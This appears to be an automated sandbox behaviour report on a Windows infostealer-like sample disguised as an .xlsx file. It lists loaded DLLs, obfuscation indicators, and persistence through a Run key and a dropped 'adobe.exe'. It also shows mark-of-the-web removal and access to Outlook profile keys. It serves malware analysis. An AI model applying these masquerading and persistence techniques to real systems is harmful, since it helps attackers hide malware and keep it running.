                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dll
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: thQh.pdb source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr
                        Source: Binary string: thQh.pdbSHA256 source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr

                        Data Obfuscation

                        barindex
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: BL NBNSA240600050.xlsx.exe, FrmLogin.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs.Net Code: E76HrBxktI System.Reflection.Assembly.Load(byte[])
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: 0xA1756FE1 [Wed Nov 3 04:15:29 2055 UTC]
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_078101B0 push eax; iretd 0_2_078101B1
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 0_2_07E45B48 pushfd ; retf 0_2_07E45B4C
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D00610 push edx; retf 2_2_00D0061A
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_00D00C6D push edi; retf 2_2_00D00C7A
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_06379F31 pushfd ; iretd 2_2_06379F32
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_0637BAB0 push es; ret 2_2_0637BAC0
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeCode function: 2_2_06377952 push es; ret 2_2_06377960
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C265D1 push cs; ret 3_2_05C265D2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C28458 push ds; ret 3_2_05C2845A
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C277C7 push ss; ret 3_2_05C277CA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C257D0 push es; ret 3_2_05C257D2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C257F3 push es; ret 3_2_05C257FA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C257F0 push es; ret 3_2_05C257F2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C27709 push ss; ret 3_2_05C2770A
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C276D0 push ss; ret 3_2_05C276D2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C26688 push cs; ret 3_2_05C2668A
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C26693 push cs; ret 3_2_05C267B2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C27630 push ss; ret 3_2_05C2765A
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2A1E0 pushfd ; ret 3_2_05C2A1E1
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C201B0 push eax; iretd 3_2_05C201B1
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F150 push ebx; ret 3_2_05C2F152
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F0E3 push ebx; ret 3_2_05C2F0EA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F0E1 push ebx; ret 3_2_05C2F0E2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F0B8 push ebx; ret 3_2_05C2F0BA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F3A9 push esp; ret 3_2_05C2F3AA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F327 push esp; ret 3_2_05C2F332
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F2D1 push esp; ret 3_2_05C2F2D2
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2F253 push esp; ret 3_2_05C2F25A
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2EDD3 push ecx; ret 3_2_05C2EDDA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2FDD9 pushad ; ret 3_2_05C2FDDA
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_05C2ADE3 pushfd ; ret 3_2_05C2ADE9
                        Source: BL NBNSA240600050.xlsx.exeStatic PE information: section name: .text entropy: 7.880091500507158
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, K8917oFDM9aCkNDFBqm.csHigh entropy of concatenated method names: 'Nfp9sGZxur', 'aw09uYq0Y3', 'SQq9rQ9Mke', 'Kec9iH16sB', 'CbI9mpEr5l', 'fXD9ygk2g6', 'gTh9U1kaSm', 'VJy9kcTPdi', 'w3q9WEuexN', 'J5e97JRtc0'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, lnLgB9ArQJDBJXbtV2.csHigh entropy of concatenated method names: 'cSe6gNlyeA', 'xrB6b9gFsE', 'KCP6A32AV0', 'PsT6ZMFlGJ', 'TbU62gnado', 'YAq6JpLFw0', 'dmD60T9vDk', 'OLh6hv6bgk', 'Eep63lrXRD', 'pj86YbXcnL'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mwpVWaCa35qDe8PjFK.csHigh entropy of concatenated method names: 'Dispose', 'V9RF8pT9mR', 'jZkR22aNsw', 'MJL55IhUY3', 'T6IFLIKDga', 'H1hFz8GFY2', 'ProcessDialogKey', 'lEGRDV0xmh', 'EF4RFCoK4w', 'Lf1RRUbt0L'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, PwiX6RFRdnPqG7PpAPo.csHigh entropy of concatenated method names: 'CbAPsK8f5W', 'RZXPulmBQF', 'wMpPr8NiiN', 'dxcpFj4VhWcUHZ4CLl2', 'aeA9Ji433Gt6UOBqgoB', 'QWFBJ64xr3jtpkBN1Xv', 'WWvawt4L1u3A0a4HKgG', 'fJyuwj48UyRQ6sfvmld', 'yJmCPc4lJCWAoWytJPU'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, WU6MGjOMCvVpcSrEqg.csHigh entropy of concatenated method names: 'u8SokFJE2l', 'jK0oW9wbuG', 'hNJoSf4LLo', 'sabo2a8Kev', 'I11o0quXcv', 'bBdohMmr1n', 'r3RoYoQhut', 'CGXo4hMWMM', 'MOdogVirZd', 'e8dovOYFYr'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, nyp7h2lEkSktRx34mN.csHigh entropy of concatenated method names: 'kuEqxOSPBS', 'dWvqLyttYO', 'FbCjDqP8Vl', 'OkwjFBFx86', 'AoEqvKnSsg', 'QIiqbG9BSK', 'esxqOMVOVt', 'd5wqAXxKP2', 'pkUqZadEND', 'SMIqKIu15W'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, BuJPS6ziS0E9VACSpR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OYR9ofikev', 'AKV966I6W9', 'Mip9cFbVwd', 'a5k9qxXGCF', 'mtQ9j1Lg2M', 'bJq99nCYq0', 'Uxx9PawGZm'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, hV0xmh8WF4CoK4wYf1.csHigh entropy of concatenated method names: 'ooZjSmj3CC', 'PENj2sMJIO', 'O9PjJD64T8', 'vvMj0UnCce', 'GFejAI04Aj', 'xsPjhADeMg', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, exKe8cY6Q80R2829i4.csHigh entropy of concatenated method names: 'omJwaXARGE', 'HB4wpghKiF', 'Yb9w5qgRjU', 'pKB5LubxAe', 'NxA5znS8eW', 'GO6wD2BE1C', 'BCswFW3wwd', 'w99wRNOVKt', 'KJywnrsEGC', 'ItlwHacYBq'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, QFHZ6TWxna4KHlLMko.csHigh entropy of concatenated method names: 'yfOpivqATc', 'U6VpyWlRB9', 'Tu2pkAoPR6', 'eTBpWKW64A', 'nbKp6us8L9', 'tUhpcTxyND', 'RvApqbIXpE', 'R99pjDvtnQ', 'MgYp93XvqQ', 'k2tpPBJTSI'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, Dbt0LtLFHvJihXRuJn.csHigh entropy of concatenated method names: 'Utn9FkePGm', 'keT9nAPtcG', 'HWX9HNVe7L', 'eeB9axFymD', 'OcS9CtABT2', 'CDf9GgFJyK', 'UVb95ycouG', 'nmPjXLZdZe', 'TPAjxNWo8g', 'ywaj8pPw3s'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mHtIwRS5kqd3vV1Tcw.csHigh entropy of concatenated method names: 'Mh45eV17KM', 'md95Cr7o7i', 'HaE5GiRnQ7', 'Fwk5wfuSAZ', 'sH35VqcP2d', 'B7sGI3ttTw', 'lemGlnq3mx', 'jbsGXlcKLY', 'Vg2GxLhCSG', 'dr5G8pM6jc'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mdGCiWky1rqgK3BVbJ.csHigh entropy of concatenated method names: 'H3tCAfBTmc', 'uhnCZdv3fg', 'zcxCKkNfgX', 'UiyCtFE85T', 'p6tCIeyH4B', 'kdOCl3Q6iJ', 'RaFCXETpWL', 'bOICxxlyXv', 'mnSC835g4L', 'cocCLpEDu3'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, Gqq4I67n35f0dnsQXh.csHigh entropy of concatenated method names: 'V0FGm6mDab', 'UMbGUv2cbf', 'AKupJq9h1Z', 'c1dp0tNtto', 'REgphY3r7O', 'r5pp3LVND5', 'e1xpYbhRJl', 'dn4p4dF4ud', 'j6PpTIVxtk', 'NUQpg1vwk6'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, WU9xXZHUFOv3sToHX0.csHigh entropy of concatenated method names: 'v61FwdGCiW', 'C1rFVqgK3B', 'MxnFEa4KHl', 'YMkF1oSqq4', 'csQF6Xh1Ht', 'UwRFc5kqd3', 'PlrKgILw8TFs35U6PA', 'uSEOmf83sduV8cyuE0', 'KPBFFsRjDD', 'h08FnHXOf3'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, PobRQUp3r4CRDKbIFP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g15R8hafGU', 'V71RLkBYKC', 'hwQRz8sMqw', 'EQqnDNrDm6', 'yccnFNUB2a', 'LMRnRZU24G', 'AjPnn9DHFg', 'bbJsGRwCsYBiAigJ6wF'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.csHigh entropy of concatenated method names: 'I4KneHuVre', 'Y6wnaP8fUI', 'eV5nCN0EuU', 'Fivnp7Tnyc', 'S4MnGZ7yjy', 'Nkln5ToQg0', 'aMgnwYRR07', 'YRWnV75sNT', 'TnNnQyQBR0', 'xEInEWsZuh'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, vSUPRMtMllWME9qh6T.csHigh entropy of concatenated method names: 'gNJqEpJX8o', 'mpaq1CYbXK', 'ToString', 'hErqahHGTv', 'cngqChBcnk', 'xoZqpH4dHf', 'qWCqGKhOdX', 'cK3q5xnrVB', 'UUaqwrEDRs', 'NoXqVRsAnX'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, oIIKDgxaJ1h8GFY2EE.csHigh entropy of concatenated method names: 'uEKjaIa7AF', 'BPGjCb3TE8', 'QMxjpdwY3q', 'gdPjGwlJup', 'hiVj57MQa7', 'gMwjw3Ah25', 'werjV7nGnH', 'LvsjQ9DMV0', 'uF2jE07Zk4', 'boaj1HIpxQ'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, qofamIT3b6JCk8JnFG.csHigh entropy of concatenated method names: 'EcCwsDob9s', 'TBtwuySddH', 'fKbwr8cnoJ', 'FHbwiryclp', 'lhFwmIYt9c', 'bydwyt6OSO', 'e2GwU6U7fS', 'FEbwkLPQBY', 'Rn4wWwlgQW', 'w5Ww7XQPm8'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, eniAxGROmKWOgQBO1N.csHigh entropy of concatenated method names: 'jd8rpPsqq', 'pVPiGW7i7', 'CkWy6eDaI', 'AgEUIqQoh', 'v9wWQIv40', 'PPQ7rrrpa', 'esSg86Z6s2bPhmGyTV', 'k53DyDYxrOVSIayRaO', 'DlUDrwQxlJsbDQDbpF', 'MHEj7Ycwe'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, VlkgChFntyasldR9WSg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ghXPAORNQf', 'E4YPZjCFZv', 'gYdPKmaobP', 'Cr1PtfVXVt', 'G09PI2dZI7', 'cHiPlCmYrm', 'jnQPXHNf6Y'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                        Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile written: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile created: C:\Users\user\AppData\Roaming\Adobe\adobe.exeJump to dropped file
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobeJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeFile opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | deleteJump to behavior
                        Source: Possible double extension: xlsx.exeStatic PE information: BL NBNSA240600050.xlsx.exe
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
